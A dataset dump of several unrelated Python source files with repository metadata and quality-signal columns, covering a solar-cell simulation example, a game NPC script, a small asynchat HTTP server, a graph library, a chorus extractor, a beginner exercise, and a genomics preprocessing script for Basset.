hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cfbad1f6c17648b152ae02e148a38ce075fb4e62 | 252 | py | Python | gpvdm_data/shape/Gaus/example.py | roderickmackenzie/gpvdm | 914fd2ee93e7202339853acaec1d61d59b789987 | [
"BSD-3-Clause"
] | 12 | 2016-09-13T08:58:13.000Z | 2022-01-17T07:04:52.000Z | gpvdm_core/inp_template/shape/example.py | roderickmackenzie/gpvdm | 914fd2ee93e7202339853acaec1d61d59b789987 | [
"BSD-3-Clause"
] | 3 | 2017-11-11T12:33:02.000Z | 2019-03-08T00:48:08.000Z | gpvdm_data/shape/Gaus/example.py | roderickmackenzie/gpvdm | 914fd2ee93e7202339853acaec1d61d59b789987 | [
"BSD-3-Clause"
] | 6 | 2019-01-03T06:17:12.000Z | 2022-01-01T15:59:00.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
from gpvdm_api import gpvdm_api
def run():
a=gpvdm_api(verbose=True)
a.set_save_dir(device_data)
a.edit("light.inp","#light_model","qe")
a.edit("jv0.inp","#Vstop","0.8")
a.run() | 19.384615 | 40 | 0.674603 | 46 | 252 | 3.543478 | 0.673913 | 0.147239 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022321 | 0.111111 | 252 | 13 | 41 | 19.384615 | 0.705357 | 0.170635 | 0 | 0 | 0 | 0 | 0.1875 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.333333 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
cfbb704f9aaa960b7d69d0dfa8df0111d8a29aa0 | 2,454 | py | Python | scripts/npc/make_ston.py | varenty-x/v204.1 | 804302399f100bcec713f58a89b3352f114c36f5 | [
"MIT"
] | 9 | 2021-04-26T11:59:29.000Z | 2021-12-20T13:15:27.000Z | scripts/npc/make_ston.py | varenty-x/v203.4 | 359d6575ef8256bb2d6df87bf4156c4608243232 | [
"MIT"
] | null | null | null | scripts/npc/make_ston.py | varenty-x/v203.4 | 359d6575ef8256bb2d6df87bf4156c4608243232 | [
"MIT"
] | 6 | 2021-07-14T06:32:05.000Z | 2022-02-06T02:32:56.000Z | # Eurek the Alchemist (2040050)
from net.swordie.ms.constants import JobConstants
echoDict = {
112: 1005, # Hero
122: 1005, # Paladin
132: 1005, # Dark Knight
212: 1005, # F/P
222: 1005, # I/L
232: 1005, # Bishop
312: 1005, # Bowmaster
322: 1005, # Marksman
412: 1005, # Night Lord
422: 1005, # Shadower
434: 1005, # Dual Blade
512: 1005, # Buccaneer
522: 1005, # Corsair
532: 1005, # Cannoneer
572: 1005, # Jett
1112: 10001005, # Dawn Warrior
1212: 10001005, # Blaze Wizard
1312: 10001005, # Wind Archer
1412: 10001005, # Night Walker
1512: 10001005, # Thunder Breaker
2112: 20001005, # Aran
2218: 20011005, # Evan
2312: 20021005, # Mercedes
2412: 20031005, # Phantom
2512: 20051005, # Shade
2712: 20041005, # Luminous
3112: 30011005, # Demon Slayer
3122: 30011005, # Demon Avenger
3212: 30001005, # Battle Mage
3312: 30001005, # Wild Hunter
3512: 30001005, # Mechanic
3712: 30001005, # Blaster
3612: 30021005, # Xenon
4112: 40011005, # Hayato
4212: 40021005, # Kanna
5112: 50001005, # Mihile
6112: 60001005, # Kaiser
6512: 60011005, # Angelic Buster
10112: 100001005, # Zero
14212: 140001005 # Kinesis
}
selection = sm.sendNext("Hi, how can I help you? #b\r\n"
"#L0#Receive Echo of Hero/Exclusive Spell#l")
if selection == 0:
if chr.getLevel() >= 200:
currentJob = chr.getJob()
if currentJob in echoDict:
echo = echoDict[currentJob]
if sm.hasSkill(echo):
sm.sendSayOkay("Hm...It looks like you have #s" + str(echo) + "# #q" + str(echo) + "# already.")
else:
response = sm.sendAskYesNo("Greetings, hero. Would you like to receive #s" + str(echo) + "# #q" + str(echo) + "#?")
if response:
sm.giveSkill(echo)
sm.sendSayOkay("You have learned #s" + str(echo) + "# #q" + str(echo) + "#.")
elif JobConstants.isBeastTamer(currentJob):
sm.sendSayOkay("Unfortunately, I can't offer Echo of Hero to Beast Tamers.")
else:
sm.sendSayOkay("Sorry, I can't grant the skill to those without proper qualifications. \r\n"
"Come back after finishing your job advancements.")
else:
sm.sendSayOkay("You don't have the makings of a hero. Speak to me again when you're at least Level 200.")
| 35.057143 | 131 | 0.597392 | 300 | 2,454 | 4.886667 | 0.663333 | 0.028649 | 0.016371 | 0.018417 | 0.032742 | 0.032742 | 0 | 0 | 0 | 0 | 0 | 0.242702 | 0.288101 | 2,454 | 69 | 132 | 35.565217 | 0.596451 | 0.158924 | 0 | 0.046875 | 0 | 0.015625 | 0.227498 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.015625 | 0 | 0.015625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cfc428f974aa00ff3dee6c7b4e66ce2e5079c59d | 1,755 | py | Python | archives/learning/bp/ch24/asynchat-example-1.py | mcxiaoke/python-labs | 61c0a1f91008ba82fc2f5a5deb19e60aec9df960 | [
"Apache-2.0"
] | 7 | 2016-07-08T10:53:13.000Z | 2021-07-20T00:20:10.000Z | archives/learning/bp/ch24/asynchat-example-1.py | mcxiaoke/python-labs | 61c0a1f91008ba82fc2f5a5deb19e60aec9df960 | [
"Apache-2.0"
] | 1 | 2021-05-11T05:20:18.000Z | 2021-05-11T05:20:18.000Z | archives/learning/bp/ch24/asynchat-example-1.py | mcxiaoke/python-labs | 61c0a1f91008ba82fc2f5a5deb19e60aec9df960 | [
"Apache-2.0"
] | 7 | 2016-10-31T06:31:54.000Z | 2020-08-31T20:55:00.000Z | # File: asynchat-example-1.py
import asyncore, asynchat
import os, socket, string
PORT = 8000
class HTTPChannel(asynchat.async_chat):
def __init__(self, server, sock, addr):
asynchat.async_chat.__init__(self, sock)
self.set_terminator("\r\n")
self.request = None
self.data = ""
self.shutdown = 0
def collect_incoming_data(self, data):
self.data = self.data + data
def found_terminator(self):
if not self.request:
# got the request line
self.request = string.split(self.data, None, 2)
if len(self.request) != 3:
self.shutdown = 1
else:
self.push("HTTP/1.0 200 OK\r\n")
self.push("Content-type: text/html\r\n")
self.push("\r\n")
self.data = self.data + "\r\n"
self.set_terminator("\r\n\r\n") # look for end of headers
else:
# return payload.
self.push("<html><body><pre>\r\n")
self.push(self.data)
self.push("</pre></body></html>\r\n")
self.close_when_done()
class HTTPServer(asyncore.dispatcher):
def __init__(self, port):
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.bind(("", port))
self.listen(5)
def handle_accept(self):
conn, addr = self.accept()
HTTPChannel(self, conn, addr)
#
# try it out
s = HTTPServer(PORT)
print "serving at port", PORT, "..."
asyncore.loop()
## GET / HTTP/1.1
## Accept: */*
## Accept-Language: en, sv
## Accept-Encoding: gzip, deflate
## User-Agent: Mozilla/4.0 (compatible; Bruce/1.0)
## Host: localhost:8000
## Connection: Keep-Alive
| 27 | 69 | 0.577778 | 228 | 1,755 | 4.320175 | 0.447368 | 0.018274 | 0.04264 | 0.048731 | 0.067005 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019763 | 0.279202 | 1,755 | 64 | 70 | 27.421875 | 0.758893 | 0.155556 | 0 | 0.05 | 0 | 0 | 0.088296 | 0.030801 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.05 | null | null | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cfc8ebb474939216aa62bdb9e6ffae2fd8ff8ede | 6,124 | py | Python | algolib/graphs/simple_graph.py | ref-humbold/AlgoLib_Python | 05f725504656ec93b879374a8cd87464d88fff77 | [
"Apache-2.0"
] | null | null | null | algolib/graphs/simple_graph.py | ref-humbold/AlgoLib_Python | 05f725504656ec93b879374a8cd87464d88fff77 | [
"Apache-2.0"
] | null | null | null | algolib/graphs/simple_graph.py | ref-humbold/AlgoLib_Python | 05f725504656ec93b879374a8cd87464d88fff77 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""Structure of simple graph"""
from abc import ABCMeta, abstractmethod
from typing import Any, Iterable, Optional, Union
from .graph import Edge, Graph, Vertex
class _GraphRepresentation:
def __init__(self, vertex_ids=None):
self._properties = {}
if vertex_ids is not None:
self._graph_dict = {Vertex(vertex_id): set() for vertex_id in vertex_ids}
else:
self._graph_dict = {}
@property
def vertices(self):
return self._graph_dict.keys()
@property
def edges(self):
result = []
for edges_set in self._graph_dict.values():
result += edges_set
return result
@property
def edges_set(self):
return self._graph_dict.values()
def __len__(self):
return len(self._graph_dict)
def get_vertex(self, vertex_id):
try:
return next(v for v in self._graph_dict.keys() if v.id == vertex_id)
except StopIteration:
raise KeyError(f"Vertex not found : {vertex_id}") from None
def get_edge(self, source_id, destination_id):
try:
source, edges = next((v, edges) for v, edges in self._graph_dict.items()
if v.id == source_id)
return next(edge for edge in edges if edge.get_neighbour(source).id == destination_id)
except StopIteration:
raise KeyError(f"Edge not found: {source_id}, {destination_id}") from None
def get_adjacent_edges(self, vertex):
self._validate(vertex)
return self._graph_dict[vertex]
def get_property(self, item):
self._validate(item, existing_edge=True)
return self._properties.get(item, None)
def set_property(self, item, value):
self._validate(item, existing_edge=True)
self._properties[item] = value
def del_property(self, item):
self._validate(item, existing_edge=True)
del self._properties[item]
def add_vertex(self, vertex):
if vertex in self._graph_dict:
return False
self._graph_dict[vertex] = set()
return True
def add_edge_to_source(self, edge):
self._validate(edge, existing_edge=False)
self._graph_dict[edge.source].add(edge)
def add_edge_to_destination(self, edge):
self._validate(edge, existing_edge=False)
self._graph_dict[edge.destination].add(edge)
def _validate(self, item, *, existing_edge=None):
if isinstance(item, Edge):
if item.source not in self._graph_dict or item.destination not in self._graph_dict:
raise ValueError(f"Edge {item} does not belong to the graph")
if existing_edge and item not in self._graph_dict[item.source] \
and item not in self._graph_dict[item.destination]:
raise ValueError(f"Edge {item} does not belong to the graph")
elif item not in self._graph_dict:
raise ValueError(f"Vertex {item} does not belong to the graph")
class SimpleGraph(Graph, metaclass=ABCMeta):
def __init__(self, vertex_ids: Optional[Iterable[Any]]):
self._representation = _GraphRepresentation(vertex_ids)
self._properties = self._GraphPropertiesImpl(self)
@property
def properties(self):
return self._properties
@property
def vertices_count(self):
return len(self._representation)
@property
def vertices(self):
return self._representation.vertices
def get_vertex(self, vertex_id):
return self._representation.get_vertex(vertex_id)
def get_edge(self, source, destination):
return self._representation.get_edge(source.id, destination.id) \
if isinstance(source, Vertex) and isinstance(destination, Vertex) else \
self._representation.get_edge(source, destination)
def adjacent_edges(self, vertex: Vertex):
return self._representation.get_adjacent_edges(vertex)
def neighbours(self, vertex: Vertex):
return set(edge.get_neighbour(vertex)
for edge in self._representation.get_adjacent_edges(vertex))
def add_vertex(self, vertex: Union[Vertex, Any], property_: Any = None) -> Vertex:
"""Adds new vertex with given property to this graph.
:param vertex: new vertex or its identifier
:param property_: vertex property
:return: the new vertex
:raise ValueError: if the vertex exists"""
the_vertex = vertex if isinstance(vertex, Vertex) else Vertex(vertex)
was_added = self._representation.add_vertex(the_vertex)
if was_added:
if property_ is not None:
self._representation.set_property(the_vertex, property_)
return the_vertex
raise ValueError(f"Vertex {the_vertex} already exists")
def add_edge_between(self, source: Vertex, destination: Vertex, property_: Any = None):
"""Adds new edge with given property to this graph.
:param source: source vertex
:param destination: destination vertex
:param property_: edge property
:return: the new edge
:raise ValueError: if the edge exists"""
return self.add_edge(Edge(source, destination), property_)
@abstractmethod
def add_edge(self, edge: Edge, property_: Any = None):
"""Adds a new edge with given property to this graph.
:param edge: a new edge
:param property_: edge property
:return: the new edge
:raise ValueError: if the edge exists"""
class _GraphPropertiesImpl(Graph.GraphProperties):
def __init__(self, graph: "SimpleGraph"):
self._graph = graph
def __getitem__(self, item: Union["Vertex", "Edge"]) -> Any:
return self._graph._representation.get_property(item)
def __setitem__(self, item: Union["Vertex", "Edge"], value: Any):
self._graph._representation.set_property(item, value)
def __delitem__(self, item: Union["Vertex", "Edge"]):
self._graph._representation.del_property(item)
| 34.59887 | 98 | 0.652351 | 758 | 6,124 | 5.034301 | 0.131926 | 0.054245 | 0.061321 | 0.035377 | 0.349057 | 0.263103 | 0.205451 | 0.167191 | 0.138365 | 0.092243 | 0 | 0.000219 | 0.255879 | 6,124 | 176 | 99 | 34.795455 | 0.837174 | 0.101241 | 0 | 0.185841 | 0 | 0 | 0.050567 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.265487 | false | 0 | 0.026549 | 0.097345 | 0.495575 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cfd3f97eb4d130eda425f8c300f730959a8cb016 | 281 | py | Python | views.py | pythonran/easy_server | 2840d76db45ac9103d2a1b7f9f044687d4f1a77e | [
"Apache-2.0"
] | null | null | null | views.py | pythonran/easy_server | 2840d76db45ac9103d2a1b7f9f044687d4f1a77e | [
"Apache-2.0"
] | null | null | null | views.py | pythonran/easy_server | 2840d76db45ac9103d2a1b7f9f044687d4f1a77e | [
"Apache-2.0"
] | null | null | null | from view_core import View
from easyserver import easyResponse
import json
class Index(View):
def get(self, request):
print request
data = {
"body": request.body,
"option": "test"
}
return easyResponse(json.dumps(data))
| 21.615385 | 45 | 0.597865 | 31 | 281 | 5.387097 | 0.645161 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.313167 | 281 | 12 | 46 | 23.416667 | 0.865285 | 0 | 0 | 0 | 0 | 0 | 0.049822 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.272727 | null | null | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cfda25ea8c41e2c58ebbd422c6cbddbd5774f03e | 311 | py | Python | Deployment/extract_chorus.py | Parvez13/Predicting-Hit-Songs-Using-Repeated-Chorus | 00ef57c05c729ee43a6ad7ad6276f1a403452f2d | [
"MIT"
] | null | null | null | Deployment/extract_chorus.py | Parvez13/Predicting-Hit-Songs-Using-Repeated-Chorus | 00ef57c05c729ee43a6ad7ad6276f1a403452f2d | [
"MIT"
] | null | null | null | Deployment/extract_chorus.py | Parvez13/Predicting-Hit-Songs-Using-Repeated-Chorus | 00ef57c05c729ee43a6ad7ad6276f1a403452f2d | [
"MIT"
] | null | null | null | from pychorus import find_and_output_chorus
def extract_song_chorus(path, main):
# songname = path.split('/',2)[0].split('.')[0]
Newpath = main + '/' + "song_to_predict"+'.wav'
chorus = find_and_output_chorus(path, Newpath, 15)
if chorus == None:
return None
else:
return Newpath
| 19.4375 | 52 | 0.655949 | 42 | 311 | 4.619048 | 0.595238 | 0.072165 | 0.134021 | 0.195876 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020161 | 0.202572 | 311 | 15 | 53 | 20.733333 | 0.762097 | 0.144695 | 0 | 0 | 0 | 0 | 0.080645 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cfdc5fe206c24d67d093476b18ea47335843481f | 806 | py | Python | aula7/exercicio/exercicio2.py | diegocolombo1989/Trabalho-Python | 4603117bebfb6e801c3289e108b4e8f29442ab6f | [
"MIT"
] | null | null | null | aula7/exercicio/exercicio2.py | diegocolombo1989/Trabalho-Python | 4603117bebfb6e801c3289e108b4e8f29442ab6f | [
"MIT"
] | null | null | null | aula7/exercicio/exercicio2.py | diegocolombo1989/Trabalho-Python | 4603117bebfb6e801c3289e108b4e8f29442ab6f | [
"MIT"
] | null | null | null | #--- Exercício 2 - Dicionários
#--- Escreva um programa que leia os dados de 11 jogadores
#--- Jogador: Nome, Posicao, Numero, PernaBoa
#--- Crie um dicionario para armazenar os dados
#--- Imprima todos os jogadores e seus dados
#--- Resolução Nicole Gruber
lista_jogadores=[]
for i in range(1,3):
Nome=input('Digite o nome do jogador: ')
Posicao=input('Digite a posiçao do jogador: ')
Numero=input('Digite o numero do jogador: ')
PernaBoa=input('Digite a Perna Boa do jogador: ')
dicionario = {'Nome': Nome, 'Posicao': Posicao, 'Numero': Numero, 'PernaBoa': PernaBoa}
lista_jogadores.append(dicionario)
for dicionario in lista_jogadores:
print(f"Nome={dicionario['Nome']}, Posiçao={dicionario['Posicao']}, Numero={dicionario['Numero']}, PernaBoa {dicionario['PernaBoa']}") | 38.380952 | 138 | 0.702233 | 104 | 806 | 5.413462 | 0.451923 | 0.078153 | 0.042629 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007331 | 0.153846 | 806 | 21 | 138 | 38.380952 | 0.818182 | 0.305211 | 0 | 0 | 0 | 0.1 | 0.473874 | 0.201802 | 0 | 0 | 0 | 0.047619 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cfde219f134665c1545cb687c39a9a1a9fe75755 | 5,561 | py | Python | Step02_Build_CNN_model/makeFiles4Basset.py | talkowski-lab/SMC_CNN_Model | 19eee4eac060e5dea72387335bc960693941b703 | [
"MIT"
] | 1 | 2021-06-12T00:56:22.000Z | 2021-06-12T00:56:22.000Z | Step02_Build_CNN_model/makeFiles4Basset.py | talkowski-lab/SMC_CNN_Model | 19eee4eac060e5dea72387335bc960693941b703 | [
"MIT"
] | null | null | null | Step02_Build_CNN_model/makeFiles4Basset.py | talkowski-lab/SMC_CNN_Model | 19eee4eac060e5dea72387335bc960693941b703 | [
"MIT"
] | 1 | 2021-11-08T22:05:05.000Z | 2021-11-08T22:05:05.000Z | #!/usr/bin/env python
from __future__ import division
import numpy.random as npr
import pysam
from Bio.Seq import reverse_complement
BASSET_FOLDER = ""
def makeBed(a,cl,inside=25,outside=75,reg=2):
d=[]
genome = pysam.Fastafile("../Input_data/GRCh37.fa")
with open(a,"r") as f:
d0=f.readlines()
for x in d0:
t=x.strip()
ch=t.split("@")[2].split(":")[0]
st=t.split("@")[2].split(":")[1]
end0 =int(t.split("@")[2].split(":")[2].split("^")[0])-1
start =int(t.split("@")[2].split("^")[1].split("&")[0])
end =int(t.split("@")[2].split("&")[1].split("^")[0])-1
start1=int(t.split("@")[2].split("|")[0].split("^")[-1])
s0 = end0-inside
e0 = end0+outside
s1 = start-outside
e1 = start+inside
s2 = end-inside
e2 = end+outside
s3 = start1-outside
e3 = start1+inside
bedname=t+"::"+cl
seq0=genome.fetch(ch,s0,e0) if st =="+" else reverse_complement(genome.fetch(ch,s0,e0))
seq1=genome.fetch(ch,s1,e1) if st =="+" else reverse_complement(genome.fetch(ch,s1,e1))
seq2=genome.fetch(ch,s2,e2) if st =="+" else reverse_complement(genome.fetch(ch,s2,e2))
seq3=genome.fetch(ch,s3,e3) if st =="+" else reverse_complement(genome.fetch(ch,s3,e3))
if reg==4:
if st=="+":
d.append(bedname+"\t"+seq0+seq1+seq2+seq3)
else:
d.append(bedname+"\t"+seq3+seq2+seq1+seq0)
elif reg==2:
if st=="+":
d.append(bedname+"\t"+seq1+seq2)
else:
d.append(bedname+"\t"+seq2+seq1)
print "Sequences extracted."
return d
def makeBassetPre(a,limit,pre):
dic={}
sz=[]
cl=[]
n=0
k=0
for d in a:
sz.append(len(d))
for i in d:
t=i.strip().split("\t")
spliceID,target=t[0].split("::")
if (target in cl)==False:
cl.append(target)
header=spliceID+"::"+target
seq=t[1]
dic[n]={"name":header,"seq":seq,"class":["0"]*len(a)}
dic[n]["class"][k]="1"
n+=1
k+=1
print "Sub-dictionary built."
print "All dictionary built:",len(dic),"entries."
train=[]
valid=[]
test =[]
remain=[]
ini=0
for x in sz:
if x <= limit:
npr.seed(122)
rnd=npr.choice(xrange(ini,ini+x),x,replace=False)
valid+=list(rnd[-int(round(x/5)):])
test+=list(rnd[:-int(round(x/5))][-int(round(x*0.1)):])
train+=list(rnd[:-int(round(x/5))][:-int(round(x*0.1))])
ini+=x
else:
x0=limit
npr.seed(122)
rnd0=npr.choice(xrange(ini,ini+x),x,replace=False)
rnd=rnd0[:x0]
valid+=list(rnd[-int(round(x0/5)):])
test+=list(rnd[:-int(round(x0/5))][-int(round(x0*0.1)):])
train+=list(rnd[:-int(round(x0/5))][:-int(round(x0*0.1))])
remain+=list(rnd0[x0:])
ini+=x
npr.seed(122)
train=npr.permutation(train)
npr.seed(122)
valid=npr.permutation(valid)
npr.seed(122)
test=npr.permutation(test)
npr.seed(122)
remain=npr.permutation(remain)
all=list(train)+list(valid)+list(test)
lft=list(remain)
print "Data separated:"
print "Training:",len(train)
print "Validation:",len(valid)
print "Test:",len(test)
print "Left:",len(lft)
#write act and fa file for Basset H5 generation
print "Writing to output..."
f1=open(pre+".fa","w")
f2=open(pre+"_act.txt","w")
f2.write("\t"+"\t".join(cl)+"\n")
for x in all:
f1.write(">"+dic[x]["name"]+"\n")
f1.write(dic[x]["seq"]+"\n")
f2.write(dic[x]["name"]+"\t"+"\t".join(dic[x]["class"])+"\n")
f1.close()
f2.close()
f3=open(pre+"_dataSplit.txt","w")
f3.write("Train:"+"\t"+str(len(train))+"\n")
f3.write("Valid:"+"\t"+str(len(valid))+"\n")
f3.write("Test:"+"\t"+str(len(test))+"\n")
f3.close()
f4=open(pre+"_left.4Test.fa","w")
f5=open(pre+"_left.names.txt","w")
for x in lft:
f4.write(">"+dic[x]["name"]+"\n")
f4.write(dic[x]["seq"]+"\n")
f5.write(dic[x]["name"]+"\n")
f4.close()
f5.close()
f6=open(pre+"_test0.4Test.fa","w")
f7=open(pre+"_test0.names.txt","w")
for x in test:
f6.write(">"+dic[x]["name"]+"\n")
f7.write(dic[x]["name"]+"\n")
f6.write(dic[x]["seq"]+"\n")
f6.close()
f7.close()
print "Making H5 file for Basset..."
cmd= BASSET_FOLDER + "/src/seq_hdf5.py -c -v " + str(len(valid)) + " -t " + str(len(test)) + " " + pre + ".fa " + pre + "_act.txt " + pre + "_learn.h5"
sta,out=commands.getstatusoutput(cmd)
print out
#cmd="/data/talkowski/dg520/projects/Basset/src/seq_hdf5.py -c -t " + str(len(remain)) + " " + pre + ".fa " + pre + "_act.txt " + pre + "_testRemain.h5"
#sta,out=commands.getstatusoutput(cmd)
#print out
return 1
def doit(a,maxi,piece,outp):
p=[]
for x in a:
p.append(makeBed(x[0],x[1],inside=25,outside=75,reg=piece))
makeBassetPre(p,maxi,outp)
return 1
#Main
doit([("../Output_data/up01tripletNames_pos_fdr01.txt","Inclusion"),
("../Output_data/dn01tripletNames_pos_fdr01.txt","Exclusion"),
("../Output_data/nc01tripletNames_all_382.txt","Stable")],
700,
4,
"../Output_data/3C")
